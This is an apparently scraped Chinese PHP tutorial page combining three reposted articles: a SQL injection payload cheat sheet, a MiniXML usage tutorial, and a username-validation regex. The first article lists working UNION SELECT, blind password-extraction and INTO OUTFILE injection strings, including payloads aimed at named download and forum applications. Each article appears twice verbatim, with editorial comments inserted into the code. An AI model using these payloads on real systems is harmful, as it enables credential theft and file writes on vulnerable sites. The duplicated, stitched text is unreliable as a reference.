[1]高级php注入方法集锦第1/2页
(说明:下列语句只有在应用把请求参数直接拼接进 SQL 字符串时才会生效;使用预处理语句并绑定参数的查询不受这类输入影响。)
来源: 互联网 发布时间: 2013-11-30
'%23
' and passWord='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整型值)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………以此类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
' and passWord='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整型值)
' and LENGTH(password)='6(探测密码长度)
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………以此类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* (可以是1或者=后直接跟)
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt (导出文件)
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
select password FROM admins where login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() (灵活应用查询)
常用查询测试语句,
select * FROM table where 1=1
select * FROM table where 'uuu'='uuu'
select * FROM table where 1<>2
select * FROM table where 3>2
select * FROM table where 2<3
select * FROM table where 1
select * FROM table where 1+1
select * FROM table where 1--1
select * FROM table where ISNULL(NULL)
select * FROM table where ISNULL(COT(0))
select * FROM table where 1 IS NOT NULL
select * FROM table where NULL IS NULL
select * FROM table where 2 BETWEEN 1 AND 3
select * FROM table where 'b' BETWEEN 'a' AND 'c'
select * FROM table where 2 IN (0,1,2)
select * FROM table where CASE WHEN 1>0 THEN 1 END
例如:夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位)
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………
例如2:灰色轨迹 变换id进行测试(meteor)
union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
union%20(select%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate
[2]php minixml详解
来源: 互联网 发布时间: 2013-11-30
使用方法如下,可以看到miniXML的使用,与ActiveLink-PHP-XML-Package-0.4.0相比,更加符合使用习惯,也更加的简单.
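// Build a small XML document with MiniXML and print it.
// Assumes the library entry point (minixml.inc.php) has already been included.
// Fix: the page showed the string quotes as \' (an escaping artefact of publishing);
// outside a string literal that is a PHP parse error, so plain quotes are restored.
$xmlDoc = new MiniXMLDoc();
// =& is kept from the original. NOTE(review): presumably MiniXML's accessors
// return by reference (PHP 4 style) — confirm for the library version in use.
$xmlRoot =& $xmlDoc->getRoot();

// Way 1: create the child directly on the parent node.
$childElement =& $xmlRoot->createChild('achild');
$childElement->attribute('name', 'annie');
// NOTE(review): when text or attribute values come from untrusted input, confirm
// that MiniXML entity-escapes them on output; otherwise markup can be injected
// into the generated document.
$childElement->text('This element has attributes and children, such as this');
$image =& $childElement->createChild('image');
$image->attribute('location', 'http://psychogenic.com/image.png');
$childElement->text('image and little');

// Way 2: create a detached element on the document, then attach it with appendChild().
$orphan =& $xmlDoc->createElement('song');
$orphan->text('tomorrow, tomorrow');
$childElement->appendChild($orphan);

print $xmlDoc->toString();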
添加一个子元素,有两种方式:第一种是直接在该结点上调用createChild;第二种是先用xmlDoc的createElement创建元素,然后再由该结点appendChild.
最后打印出来的结果是(注意:输出中的 eyes、hair 两个属性并未在上面的代码中设置,应是原文省略了相应的 attribute 调用):
<?xml version="1.0"?>
<achild name="annie" eyes="#0000FF" hair="#FF0000">
This element has attributes and children, such as this
<image location="http://psychogenic.com/image.png" />
image and little
<song> tomorrow, tomorrow </song>
</achild>
可以很明显的看得出,miniXML的使用方法是非常简单的,尤其是对于简单的保存数据的XML文件,更是如此,详细可以看miniXML提供的例子.此处不详说.
=========================================================================
解析
minixml文件结构是:
minixml.inc.php
------classes
-----------doc.inc.php element.inc.php node.inc.php treecomp.inc.php
详细的API解释说明,在官方网站上有介绍: http://minixml.psychogenic.com/api.html.
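// Build a small XML document with MiniXML and print it.
// Assumes the library entry point (minixml.inc.php) has already been included.
// Fix: the page showed the string quotes as \' (an escaping artefact of publishing);
// outside a string literal that is a PHP parse error, so plain quotes are restored.
$xmlDoc = new MiniXMLDoc();
// =& is kept from the original. NOTE(review): presumably MiniXML's accessors
// return by reference (PHP 4 style) — confirm for the library version in use.
$xmlRoot =& $xmlDoc->getRoot();

// Way 1: create the child directly on the parent node.
$childElement =& $xmlRoot->createChild('achild');
$childElement->attribute('name', 'annie');
// NOTE(review): when text or attribute values come from untrusted input, confirm
// that MiniXML entity-escapes them on output; otherwise markup can be injected
// into the generated document.
$childElement->text('This element has attributes and children, such as this');
$image =& $childElement->createChild('image');
$image->attribute('location', 'http://psychogenic.com/image.png');
$childElement->text('image and little');

// Way 2: create a detached element on the document, then attach it with appendChild().
$orphan =& $xmlDoc->createElement('song');
$orphan->text('tomorrow, tomorrow');
$childElement->appendChild($orphan);

print $xmlDoc->toString();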
添加一个子元素,有两种方式:第一种是直接在该结点上调用createChild;第二种是先用xmlDoc的createElement创建元素,然后再由该结点appendChild.
最后打印出来的结果是(注意:输出中的 eyes、hair 两个属性并未在上面的代码中设置,应是原文省略了相应的 attribute 调用):
<?xml version="1.0"?>
<achild name="annie" eyes="#0000FF" hair="#FF0000">
This element has attributes and children, such as this
<image location="http://psychogenic.com/image.png" />
image and little
<song> tomorrow, tomorrow </song>
</achild>
可以很明显的看得出,miniXML的使用方法是非常简单的,尤其是对于简单的保存数据的XML文件,更是如此,详细可以看miniXML提供的例子.此处不详说.
=========================================================================
解析
minixml文件结构是:
minixml.inc.php
------classes
-----------doc.inc.php element.inc.php node.inc.php treecomp.inc.php
详细的API解释说明,在官方网站上有介绍: http://minixml.psychogenic.com/api.html.
[3]php正则校验用户名介绍
来源: 互联网 发布时间: 2013-11-30
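<?php
// Validate the user name held in $str: 1 to 32 characters, each a word
// character (\w), a hyphen or a dot. Prints 'yes' when it passes, 'no' otherwise.
//
// \A and \z anchor the entire subject. The original ^...$ form can also match
// a value that ends in a line break, so "admin\n" would have been accepted and
// would differ from the stored "admin" only by an invisible character.
//
// NOTE(review): with mb_ereg, \w follows mb_regex_encoding(); under a multibyte
// encoding it presumably also matches non-ASCII letters and digits. If only
// ASCII names are intended, use [A-Za-z0-9_] — confirm against requirements.
// NOTE(review): "." and ".." satisfy this pattern, as do names starting with
// "-"; do not use the validated value as a path component or a command-line
// argument without a further check.
//
// A missing or non-string $str is rejected before the pattern is applied.
if (isset($str) && is_string($str) && mb_ereg('\A[\w\-\.]{1,32}\z', $str)) {
    echo 'yes';
} else {
    echo 'no';
}
?>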
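// Validate the user name held in $str: 1 to 32 characters, each a word
// character (\w), a hyphen or a dot. Prints 'yes' when it passes, 'no' otherwise.
//
// \A and \z anchor the entire subject. The original ^...$ form can also match
// a value that ends in a line break, so "admin\n" would have been accepted and
// would differ from the stored "admin" only by an invisible character.
//
// NOTE(review): with mb_ereg, \w follows mb_regex_encoding(); under a multibyte
// encoding it presumably also matches non-ASCII letters and digits. If only
// ASCII names are intended, use [A-Za-z0-9_] — confirm against requirements.
// NOTE(review): "." and ".." satisfy this pattern, as do names starting with
// "-"; do not use the validated value as a path component or a command-line
// argument without a further check.
//
// A missing or non-string $str is rejected before the pattern is applied.
if (isset($str) && is_string($str) && mb_ereg('\A[\w\-\.]{1,32}\z', $str)) {
    echo 'yes';
} else {
    echo 'no';
}
?>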